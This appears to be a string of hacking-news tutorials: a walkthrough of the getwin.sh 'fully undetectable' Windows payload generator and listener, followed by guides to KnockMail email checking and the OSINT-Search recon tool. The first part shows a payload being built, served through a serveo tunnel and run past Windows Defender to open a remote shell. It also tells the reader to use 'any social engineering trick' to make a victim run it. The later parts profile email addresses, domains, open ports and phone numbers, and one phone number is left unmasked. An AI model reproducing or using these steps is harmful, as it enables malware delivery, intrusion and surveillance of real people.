root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh

     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::

• After the tool has started, press enter to set default port. Then enter payload name(test01) and select the icon.

 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …

• As you can see listener connection has started. Now you can use any social engineering trick to execute the payload in victim computer.

• For testing we will use Windows 10 1809 with Windows Defender enabled.

• So now we will execute the payload in Windows 10 OS.

• After creating the payload (test01.exe). Execute the payload (test01.exe). Simply double click the executable.
• As you double click on the payload (test01.exe). A session will be created between victim and the target machine and you will get windows shell.
• Tools like this are the part of ethical hacking courses offered by International Institute of Cyber Security

Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…
 listening on [any] 4342 …
 connect to [127.0.0.1] from localhost [127.0.0.1] 43878
 TCP connection from 27.4.174.190 on port 3352
 Microsoft Windows [Version 10.0.17758.1]
 (c) 2018 Microsoft Corporation. All rights reserved.
 E:>C:
 C:
 C:>ipconfig
 ipconfig
 Windows IP Configuration
 Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
    IPv4 Address. . . . . . . . . . . : 192.168.1.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%13
                                        192.168.1.1
C:>getmac
 getmac
 Physical Address    Transport Name
 =================== ==========================================================
 ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hide the MAC address)

• Now attacker can change or view any file of target’s Windows 10 computer.

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

• For testing we are using Kali Linux 2019.1 amd64. Before installing Knockmail, must ensure to install python.
• Type sudo apt-get update && sudo apt-get install python.
• Type git clone https://github.com/4w4k3/KnockMail.git
• Type cd KnockMail && chmod u+x requeriments.txt knock.py
• Type pip install -r requeriments.txt
• Type python knock.py

root@kali:~/Downloads/KnockMail# python knock.py

By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.

• Type 2 & then enter email address. baj#############@gmail.com is the testing email id.
• For testing we are using one of our ethical hacking researchers of International Institute of Cyber Security email ID. For security we have hide the email address.

KKM > 2
 Type the email to search: baj#############@gmail.com
 [*] FOUND - [baj#############@gmail.com ]
 KKM >

• Above query shows that email exist & is found by Knockmail.
• For further testing we are using unknown mail id. The mail representing to open first Demat account. Mail came from newsletters@smtpmailbox.com as a spam

• While checking email with Knock mail. We found :
• Typepython knock.py

 root@kali:~/Downloads/KnockMail# python knock.py 

By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.

• Type 2 & then enter newsletters@smtpmailbox.com

KKM > 2
 Type the email to search: newsletters@smtpmailbox.com
 [!] NOTFD - [newsletters@smtpmailbox.com]
 KKM >

• Above output shows that email address is not found (NOTFD). Which means email has generated from temporary mail address. Or temporary email server has been used to send spam emails to targets.

Using Small List of Emails :-

• Type python knock.py

root@kali:~/Downloads/KnockMail# python knock.py  

By: @4w4k3
https://github.com/4w4k3
[-                                              -]


 _|    _|                                _|
 _|  _|    _|_|_|      _|_|      _|_|_|  _|  _|
 _|_|      _|    _|  _|    _|  _|        _|_|
 _|  _|    _|    _|  _|    _|  _|        _|  _|
 _|    _|  _|    _|    _|_|      _|_|_|  _|    _|
                                               mail
            [ ] Knock Knock Mail [ ]
                                        v1.0
[-                                              -]

-Usage- Select an option:

  [1]     Perform a search of emails from specified file.
  [2]     Single search for specified email.
  [U]     Update.
  [E]     Exit.

• Type 1 then enter /root/Downloads/KnockMail/inputfile.txt
• For testing we have hide list of email addresses. For grabbing list of email addresses you can use Theharvester.

KKM > 1
 Type the path of file containing a list of emails: /root/Downloads/KnockMail/inputfile.txt
 [!] NOTFD - [r##########dd@gmail.com] {line 1}
 [*] FOUND - [U##############ol@hotmail.com] {line 2}
 [!] NOTFD - [e###########ge@protonmail.com] {line 3}
 KKM >

• Above query shows only one email id is found & rest of email ID were not found. This tool shows emails existence.

The post Solution to spamming, Check any Unknown Email ID existence appeared first on Information Security Newspaper | Hacking News.

Today we came with another OSINT tool which is used in gathering information. It is very common that OSINT tools are used for threat intelligence or cyber investigations. OSINT search Description is an small python script used in extracting data using different search engines & different developers API keys. An python script which is designed to search for public email addresses, domains, phone numbers.

OSINT Functionality Offers :-

• Find personal information such as – name, gender, GPS location, age, languages, social network profiles, etc…
• Find information related to data breaches.
• Find which country a phone number belongs.
• Find results of google hacking techniques.
• Find results related to domains or an IP addresses.
• Find digital certificates for an certain domain.
• Find CMS for a certain website.
• Find DNS Records and zone transfers information for a certain domain.
• Find Facebook ID and a facebook page full of photos after getting a facebook profile URL.
• Find URLs present in some web page.
• Find URL to know what torrents are being downloaded from some IP.

Installation Of OSINT Search Description :-

• For testing Kali Linux 2019.1 amd64 is used. The tool was tested on Live boot of Kali Linux 2019.1 amd64.
• Before installation of OSINT search. Make sure python3 is installed. For installing python type sudo apt-get update & sudo apt-get install python3 As tool runs on python3.
• If python3 is installed. Type sudo apt-get install python3-dev

root@kali:~/Downloads# apt-get update
 Get:1 https://ftp.yzu.edu.tw/Linux/kali kali-rolling InRelease [30.5 kB]
 Get:2 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main Sources [12.8 MB]
 e amd64 Packages [187 kB]
 Fetched 30.4 MB in 14s (2,120 kB/s)
 Reading package lists… Done

root@kali:~/Downloads# apt-get install python3
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following packages were automatically installed and are no longer required:
   libpython3.6 libpython3.6-dev python3.6-dev
 Use 'apt autoremove' to remove them.
 The following additional packages will be installed:
   libpython3-dev libpython3-stdlib libpython3.7 libpython3.7-dev libpython3.7-minimal libpython3.7-stdlib python3-dev
   python3-distutils python3-minimal python3.7 python3.7-dev python3.7-minimal
 Suggested packages:
   python3-doc python3-tk python3-venv python3.7-venv python3.7-doc
 The following NEW packages will be installed:
   libpython3.7-dev python3.7-dev

• So install pip3 version. For that type sudo apt-get install python3-pip
• Type git clone https://github.com/am0nt31r0/OSINT-Search.git

root@kali:~/Downloads# git clone https://github.com/am0nt31r0/OSINT-Search.git
 Cloning into 'OSINT-Search'…
 remote: Enumerating objects: 30, done.
 remote: Counting objects: 100% (30/30), done.
 remote: Compressing objects: 100% (30/30), done.
 remote: Total 171 (delta 8), reused 0 (delta 0), pack-reused 141
 Receiving objects: 100% (171/171), 61.15 KiB | 279.00 KiB/s, done.
 Resolving deltas: 100% (55/55), done.

• Type cd OSINT-Search & type chmod u+x requirements.txt & type chmod u+x osintS34rCh.py
• Type ls- ltr for checking permissions.

root@kali:~/Downloads# cd OSINT-Search/ 
root@kali:~/Downloads/OSINT-Search# chmod u+x requirements.txt
root@kali:~/Downloads/OSINT-Search# chmod u+x osintS34rCh.py
root@kali:~/Downloads/OSINT-Search# ls -ltr
 total 52
 -rwxr--r-- 1 root root   145 May  1 05:05 requirements.txt
 -rw-r--r-- 1 root root  4317 May  1 05:05 README.md
 -rwxr--r-- 1 root root 40432 May  1 05:05 osintS34rCh.py

• Type pip3 install -r requirements.txt

root@kali:~/Downloads/OSINT-Search# pip3 install -r requirements.txt
 Collecting git+https://github.com/abenassi/Google-Search-API (from -r requirements.txt (line 3))
   Cloning https://github.com/abenassi/Google-Search-API to /tmp/pip-req-build-f4j93eyc
 Collecting validate_email (from -r requirements.txt (line 1))
   Downloading https://files.pythonhosted.org/packages/84/a0/cb53fb64b52123513d04f9b913b905f3eb6fda7264e639b4573cc715c29f/validate_email-1.3.tar.gz
 Collecting opencnam (from -r requirements.txt (line 2))
   Downloading https://files.pythonhosted.org/packages/25/cc/b3bdfedabcf0d0b9b2438dd00d1f65ca8d2d691ba24030cc544a6a0114e8/opencnam-0.6-py3-none-any.whl
 Collecting pyfiglet (from -r requirements.txt (line 4))
   Downloading https://files.pythonhosted.org/packages/33/07/fcfdd7a2872f5b348953de35acce1544dab0c1e8368dca54279b1cde5c15/pyfiglet-0.8.post1-py2.py3-none-any.whl (865kB)
     100% |████████████████████████████████| 870kB 908kB/s

• Type pip3 install git+https://github.com/abenassi/Google-Search-API –upgrade

root@kali:~/Downloads/OSINT-Search# pip3 install git+https://github.com/abenassi/Google-Search-API --upgrade
 Collecting git+https://github.com/abenassi/Google-Search-API
   Cloning https://github.com/abenassi/Google-Search-API to /tmp/pip-req-build-b5sd1rin
 Requirement already satisfied, skipping upgrade: beautifulsoup4 in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (4.6.3)
 Requirement already satisfied, skipping upgrade: fake-useragent in /usr/local/lib/python3.7/dist-packages (from Google-Search-API==1.1.14) (0.1.11)
 Requirement already satisfied, skipping upgrade: future in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (0.15.2)
 Requirement already satisfied, skipping upgrade: requests in /usr/lib/python3/dist-packages (from Google-Search-API==1.1.14) (2.20.0)
 Requirement already satisfied, skipping upgrade: selenium<3.0.0,>=2.44.0 in /usr/local/lib/python3.7/dist-packages (from Google-Search-API==1.1.14) (2.53.6)

• Type pip3 install https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip –user

root@kali:~/Downloads/OSINT-Search# pip3 install https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip --user
 Collecting https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip
   Downloading https://github.com/PaulSec/API-dnsdumpster.com/archive/master.zip
      \ 266kB 21.3MB/s
 Collecting bs4 (from dnsdumpster==0.5)
   Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz
 Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from dnsdumpster==0.5) (2.20.0)

• Type python3 osintS34rCh.py

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

[-] The following procedure is necessary in order to save your API keys…
 [-] Hit enter if you don't have the keys.
 [-] The data will be written into a file called [/osintSearch.config.ini] that can be edited by you after.
 [?] What is your PIPL API key? 

• Now from here, enter API keys which are required from the following URLs.
• Create account in each following URLs & copy their APIs into required field of osintS34rCh.py

https://pipl.com/api
https://www.opencnam.com
https://www.shodan.io
https://whatcms.org/API
https://censys.io/register
https://dashboard.fullcontact.com/consents

• After copying type python3 osintS34rCh.py

[?] What is your PIPL API key?
 gm#####################yj9
 [?] What is your FullContact API key?
 Uh############H9rPOez###########sz
 [?] What is your CNAM SID?
 AC1##############88d73e0##########
 [?] What is your CNAM AUTH_TOKEN?
 A###############c403d9############fe5
 [?] What is your Shodan API key?
 a###############wlcjD###################rM
 [?] What is your WhatCMS API key?
 2##########################ac5376ef9f2d##################ce2c40#######d2
 [?] What is your Censys API id?
 6#######8-####-4723-####-#########bc4e
 [?] What is your Censys API secret?
 ###############2HyMxEOYrY##############
 [?] What is your TowerData API key?
 c6###################3b09a0############aa8a

• Type python3 osintS34rCh.py -h

 root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -h
 osintS34rCh v1.0

USAGES
   Email
   ./osintS34rCh -e                                # All Searches: Pipl, FullContact, Haveibeenpwnded Data Breaches and Credentials Pastes, TowerData - validate e-mail
   ./osintS34rCh -e  --pipl                        # Pipl

Domain
   ./osintS34rCh.py -t                                   # All Searches: Shodan Recon, crt.sh, DNSDumpster, All Google Hacking Dorks, HackerTarget - DNS Zonetransfer
   ./osintS34rCh.py -t  --shodan                         # Shodan Recon

IP
   ./osintS34rCh.py -t                                       # All Searchs: Shodan and Censys Recon
   ./osintS34rCh.py -t  --shodan                             # Shodan Recon

URL
   ./osintS34rCh.py -u                                      # WhatCMS Check, HackerTarget - Extract URLs
   ./osintS34rCh.py -u  --cms                               # WhatCMS Check

URL
   ./osintS34rCh.py -u                                      # WhatCMS Check, HackerTarget - Extract URLs
   ./osintS34rCh.py -u  --cms                               # WhatCMS Check

Find Email IDs

• Type python3 osintS34rCh.py -e abh#########a6##@gmail.com –pwned
• -e is used to search information about emails.
• abh#########a6##@gmail.com is the target email id. For security we have hide the email id and as this email ID is created specifically for cyber forensics classes of International Institute of Cyber Security.
• –pwned is query to search for if there is any data breach.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -e abh##########a6##@gmail.com --pwned

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Data Breaches Results
 [@] Target: abh###########a6##@gmail.com
 [] Data breach: Digimon [] Title: Digimon
 [] Domain: digimon.co.in [] Date of the breach: 2016-09-05
 [] Number of accounts breached: 7687679 [] Description: In September 2016, over 16GB of logs from a service indicated to be digimon.co.in were obtained, most likely from an unprotected Mongo DB instance. The service ceased running shortly afterwards and no information remains about the precise nature of it. Based on enquiries made via Twitter, it appears to have been a mail service possibly based on PowerMTA and used for delivering spam. The logs contained information including 7.7M unique email recipients (names and addresses), mail server IP addresses, email subjects and tracking information including mail opens and clicks.
 [] Logo image from Digimon: https://haveibeenpwned.com/Content/Images/PwnedLogos/Email.png [] Data breached: Email addresses
 [] Data breached: Email messages [] Data breached: IP addresses
 [*] Data breached: Names
 [] Data breach: Dubsmash [] Title: Dubsmash
 [] Domain: dubsmash.com [] Date of the breach: 2018-12-01
 [] Number of accounts breached: 161749950 [] Description: In December 2018, the video messaging service Dubsmash suffered a data breach. The incident exposed 162 million unique email addresses alongside usernames and PBKDF2 password hashes. In 2019, the data appeared listed for sale on a dark web marketplace (along with several other large breaches) and subsequently began circulating more broadly. The data was provided to HIBP by a source who requested it to be attributed to "BenjaminBlue@exploit.im".
 [] Logo image from Dubsmash: https://haveibeenpwned.com/Content/Images/PwnedLogos/Dubsmash.png [] Data breached: Email addresses
 [] Data breached: Geographic locations [] Data breached: Names
 [] Data breached: Passwords [] Data breached: Phone numbers
 [] Data breached: Spoken languages [] Data breached: Usernames
 [] Data breach: MySpace [] Title: MySpace
 [] Domain: myspace.com [] Date of the breach: 2008-07-01
 [] Number of accounts breached: 359420698 [] Description: In approximately 2008, MySpace suffered a data breach that exposed almost 360 million accounts. In May 2016 the data was offered up for sale on the "Real Deal" dark market website and included email addresses, usernames and SHA1 hashes of the first 10 characters of the password converted to lowercase and stored without a salt. The exact breach date is unknown, but analysis of the data suggests it was 8 years before being made public.
 [] Logo image from MySpace: https://haveibeenpwned.com/Content/Images/PwnedLogos/MySpace.png [] Data breached: Email addresses
 [] Data breached: Passwords [] Data breached: Usernames
 [] Data breach: Tumblr [] Title: tumblr
 [] Domain: tumblr.com [] Date of the breach: 2013-02-28
 [] Number of accounts breached: 65469298 [] Description: In early 2013, tumblr suffered a data breach which resulted in the exposure of over 65 million accounts. The data was later put up for sale on a dark market website and included email addresses and passwords stored as salted SHA1 hashes.
 [] Logo image from Tumblr: https://haveibeenpwned.com/Content/Images/PwnedLogos/Tumblr.png [] Data breached: Email addresses
 [*] Data breached:Passwords 

• Above output shows, there are 3 data breached with above email id. First one is the DUBMASH messaging application.
• An video messaging application experienced data breach in December 2018 with over 162 millions of emails. Later on data containing usernames & password hashes were sold on dark web.
• Second is an way old but effective data breach on Myspace. Myspace is popular social networking site offers photos, music, video, user submission of network friends. As per above data breach, this site data was also found on sale in REAL DARK website. Including usernames, passwords hashes, addresses.
• Third is Tumblr breach where it was suffered of data breach around 65 million which was on sale on dark market.

Find Hosts, Public Keys of Target

• Type python3 osintS34rCh.py -t certifiedhacker.com
• -t is used for searching information related to domain.
• certifiedhacker.com is target site.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -t certifiedhacker.com

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Shodan Results
 -> Shodan Results
 [@] Target: certifiedhacker.com
 [!] Shodan: information about certifiedhacker.com was not found.

 -> CRT.sh Results
 [@] Target: certifiedhacker.com
 [-] URL: https://crt.sh/?q=%25certifiedhacker.com
 [] Issuer CA ID: 16418 [] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
 [] Name: events.certifiedhacker.com [] Logged At: 2019-03-07T17:07:30.61
 [] Not before: 2019-03-07T16:07:29 [] Not after: 2019-06-05T16:07:29
 [] Issuer CA ID: 16418 [] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
 [] Name: fleet.certifiedhacker.com [] Logged At: 2019-03-07T17:07:30.61
 [] Not before: 2019-03-07T16:07:29 [] Not after: 2019-06-05T16:07:29
 [] Issuer CA ID: 16418 [] Issuer Name: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
 [] Name: iam.certifiedhacker.com [] Logged At: 2019-03-07T17:07:30.61
 [] Not before: 2019-03-07T16:07:29 [] Not after: 2019-06-05T16:07:29

-> DNSdumpster Results
 [@] Target: certifiedhacker.com
 [*] DNS Servers
 Domain: ns2.bluehost.com.
 IP: 162.159.25.175
 Reverse DNS: ns2.bluehost.com
 AS: AS13335
 ISP: Cloudflare Inc
 Country: United States
 Header:
 Domain: ns1.bluehost.com.
 IP: 162.159.24.80
 Reverse DNS: ns1.bluehost.com
 AS: AS13335
 ISP: Cloudflare Inc
 Country: United States
 Header: 
 [*] MX Records
 Domain: 0 mail.certifiedhacker.com.
 IP: 162.241.216.11
 Reverse DNS: box5331.bluehost.com
 AS: AS20013
 ISP: CyrusOne LLC
 Country: United States
 Header: mail.certifiedhacker.com. 
 [*] TXT Records
 "v=spf1 a mx ptr include:bluehost.com ?all" 
 [*] Host Records
 Domain: soc.certifiedhacker.com
 IP: 162.241.216.11
 Reverse DNS: box5331.bluehost.com
 AS: AS20013
 ISP: CyrusOne LLC
 Country: United States
 Header: nginx/1.12.2HTTPS: nginx/1.12.2FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.//SSH: SSH-2.0-OpenSSH_5.3TCP8080: nginx/1.12.2
 Domain: www.soc.certifiedhacker.com
 IP: 162.241.216.11
 Reverse DNS: box5331.bluehost.com
 AS: AS20013
 ISP: CyrusOne LLC
 Country: United States
 Header: nginx/1.12.2HTTPS: nginx/1.12.2FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.//SSH: SSH-2.0-OpenSSH_5.3TCP8080: nginx/1.12.2
 Domain: itf.certifiedhacker.com
 IP: 162.241.216.11
 Reverse DNS: box5331.bluehost.com
 AS: AS20013
 ISP: CyrusOne LLC
 Country: United States
 Header: nginx/1.12.2HTTPS: nginx/1.12.2FTP: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------//220-You are user number 1 of 150 allowed.//220-Local time is now 23:54. Server port: 21.//220-IPv6 connections are also welcome on this server.//220 You will be disconnected after 15 minutes of inactivity.//SSH: SSH-2.0-OpenSSH_5.3TCP8080: nginx/1.12.2 

-> Zone Transfer Results
 ; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> axfr @ns2.bluehost.com certifiedhacker.com
 ; (1 server found)
 ;; global options: +cmd
 ; Transfer failed.
 ; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> axfr @ns1.bluehost.com certifiedhacker.com
 ; (1 server found)
 ;; global options: +cmd
 ; Transfer failed.

• Above output shows shodan was unable to find everything about target site. Then Crt.sh find the URLs same as target site. Crt.sh shows the domains & sub-domains of target website. Crt.sh (Certificate Transparency) is developed to increase security of public key.
• When we open the first link from crt.sh. It shows associated links same as target site(certified hacker.com)

• Above link shows same link as like certifiedhacker.com. Opening first link shows the public key of URL with the common name of Let’s encrypt authority.

————————————————–SNIP———————————————

• Further it shows issued certificates on the URL. Then it shows authentication of URL. Valid shows that browser has passed the authentication on every purposes.
• Most of URLs in crt.sh shows same authentications.
• DNSdumpster is designed to search for discovered hosts related to domains. DNSdumpster find all the visible hosts for the attackers.
• In the above output, Dnsdumpster has gather 5 host records & other domains of target site. There are numerous way to gather hosts of any domain. We have shown how NSLOOKUP is used in gathering different hosts.
• Then it shows the different domains of target site containing reverse dns, country, IP address, ISP & header of dns.
• Above output of OSINT search has gathered different records which can be used in further scanning methods.
• Then it shows name of the server in zone transfer but was unable to transfer any part of the file.

Finding Open Ports

• Type python3 osintS34rCh.py -t 162.241.216.11
• -t is used to enter IP address.
• 162.241.216.11 is the target IP address.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -t 162.241.216.11

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Shodan Results
 [@] Target: 162.241.216.11
 [] City: Provo [] Country: United States
 [] Postal Code: 84606 [] Longitude: -111.6133
 [] Latitude: 40.21809999999999 [] Operation System: None
 [] Organization: CyrusOne LLC [] ISP: Unified Layer
 [] Port: 465 [] Port: 443
 [] Port: 2096 [] Port: 8080
 [] Port: 995 [] Port: 993
 [] Port: 22 [] Port: 587
 [] Port: 53 [] Port: 25
 [] Port: 80 [] Port: 2222
 [] Port: 2087 [] Port: 5432
 [] Port: 2082 [] Port: 2083
 [] Port: 26 [] Hostname: box5331.bluehost.com

 -> Censys Results
 [] IP: 162.241.216.11 [] Protocol: 80/http
 [] Protocol: 3306/mysql [] Protocol: 8080/http
 [] Protocol: 993/imaps [] Protocol: 465/smtp
 [] Protocol: 995/pop3s [] Protocol: 110/pop3
 [] Protocol: 21/ftp [] Protocol: 143/imap
 [] Protocol: 53/dns [] Protocol: 587/smtp
 [] Protocol: 443/https [] Protocol: 22/ssh
 [] Protocol: 5432/postgres [] Country: United States
 [] Registered Country: United States [] Longitude: -111.6442
 [] Latitude: 40.2342 [] Continent: North America
 [] Timezone: America/Denver [] AS Name: UNIFIEDLAYER-AS-1 - Unified Layer
 [] AS Country Code: US [] AS Description: UNIFIEDLAYER-AS-1 - Unified Layer

 [] Service: https/443 [] Certificate DNS Names: ['.bluehost.com', 'bluehost.com'] [] Issued By: {'common_name': ['COMODO RSA Domain Validation Secure Server CA'], 'country': ['GB'], 'locality': ['Salford'], 'province': ['Greater Manchester'], 'organization': ['COMODO CA Limited']}
 [] Service: dns/53 [] Open Resolver: True
 [*] Lookup Answers: {'type': 'A', 'name': 'c.afekv.com', 'response': '162.241.216.11'}

 [*] Updated at: 2019-05-01T08:18:45+00:00

• Above output shows open ports from shodan containing registered country with longitude & latitude.
• Shodan has found open ports of target site. Some ports which are found with common vulnerability can be used in further footprinting methods.
• Censys has also found common listed ports which are used in information gathering methods.
• These all techniques are the curriculum of ethical hacking classes of International Institute of Cyber Security.

Extracting URLs

• Type python3 osintS34rCh.py -u certifiedhacker.com
• -u is used to enter domain name.
• certifiedhacker.com is target domain name.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -u certifiedhacker.com

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Extract URLs Results
 Visible links
 https://certifiedhacker.com/
 https://certifiedhacker.com/images/icons/lock-and-key-110.png
 https://certifiedhacker.com/
 https://certifiedhacker.com/sample-login.html
 https://certifiedhacker.com/P-folio/index.html
 https://certifiedhacker.com/images/slideshow/slide-1.png
 https://certifiedhacker.com/Online Booking/index.htm
 https://certifiedhacker.com/images/slideshow/slide-2.png
 https://certifiedhacker.com/corporate-learning-website/01-homepage.html
 https://certifiedhacker.com/images/slideshow/slide-3.png
 https://certifiedhacker.com/Real Estates/index.html
 https://certifiedhacker.com/images/slideshow/slide-4.png
 https://certifiedhacker.com/Recipes/index.html
 https://certifiedhacker.com/images/slideshow/slide-5.png
 https://certifiedhacker.com/Social Media/index.html
 https://certifiedhacker.com/images/slideshow/slide-6.png
 https://certifiedhacker.com/Turbo Max/index.htm
 https://certifiedhacker.com/images/slideshow/slide-7.png
 https://certifiedhacker.com/Under Construction/index.html
 https://certifiedhacker.com/images/slideshow/slide-8.png
 https://certifiedhacker.com/Under the trees/index.html
 https://certifiedhacker.com/images/slideshow/slide-9.png
 https://certifiedhacker.com/

• After scanning with URL query, OSINT-search has gather all the links of target site. The above link can be used in further footprinting methods.

Finding Details of Mobile Numbers

• Type python3 osintS34rCh.py -p +919####677## –callerID
• -p is used for to enter phone number, –callerID is the query.
• +919####677## is target mobile number. For security, mobile number is hidden. Mobile number forensics is the essential topic of cyber forensics classes of International Institute of Cyber Security

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +918071992699 --callerID

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Caller ID Results
 [] Number: +919####677## [] Country: DELHI IN

• Above output shows current location of mobile number. Output can be used in initial phase of footprinting/ reconnaissance method.
• Type python3 osintS34rCh.py -p +919####254## –callerID
• -p is used for to enter phone number, –callerID is the query.
  
• +919####254## is target mobile number. For security, mobile number is hidden.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +919####254##  --callerID

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Caller ID Results
 [] Number: +919####254## [] Country: DELHI IN

• Above output shows current location of mobile number. Output can be used in initial phase of footprinting/ reconnaissance method.
• Type python3 osintS34rCh.py -p +52#########78 –callerID
• -p is used for to enter phone number. –callerID is the query.
  
• +52#########78 is target mobile number. For security, mobile number is hidden.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p+52#########78  --callerID

              _       __  __________ __ __       ________
  ____  _____(_)___  / /_/ ___/__  // // / _____/ ____/ /_
 / __ \/ ___/ / __ \/ __/\__ \ /_ </ // /_/ ___/ /   / __ \
/ /_/ (__  ) / / / / /_ ___/ /__/ /__  __/ /  / /___/ / / /
\____/____/_/_/ /_/\__//____/____/  /_/ /_/   \____/_/ /_/

-> Caller ID Results
 [] Number: +52#########78 [] Country: VARRERA

• Above output shows current location of mobile number. Output can be used in initial phase of footprinting/ reconnaissance method.
• Type python3 osintS34rCh.py -p +52########02 –callerID
• -p is used for to enter phone number. –callerID is the query.
  
• +52########02 is target mobile number. For security, mobile number is hidden.

root@kali:~/Downloads/OSINT-Search# python3 osintS34rCh.py -p +52########02 --callerID

              _       __  __________ __ __       ________
